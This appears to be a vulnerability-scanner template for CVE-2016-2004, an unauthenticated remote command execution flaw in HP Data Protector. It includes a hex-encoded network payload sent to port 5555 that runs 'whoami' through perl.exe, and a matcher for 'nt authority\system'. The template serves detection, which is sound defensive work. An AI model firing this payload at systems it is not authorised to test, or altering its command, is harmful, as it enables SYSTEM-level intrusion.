id: CVE-2016-2004 info: name: HP Data Protector - Arbitrary Command Execution author: pussycat0x severity: critical description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. reference: - https://www.exploit-db.com/exploits/39858 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 - http://www.kb.cert.org/vuls/id/267328 - https://www.exploit-db.com/exploits/39858/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-2004 cwe-id: CWE-306 tags: cve,cve2016,network,iot,hp,rce,edb network: - inputs: - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami type: hex host: - "{{Hostname}}" - "{{Host}}:5555" matchers: - type: word encoding: hex words: - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system # Enhanced by mp on 2022/05/10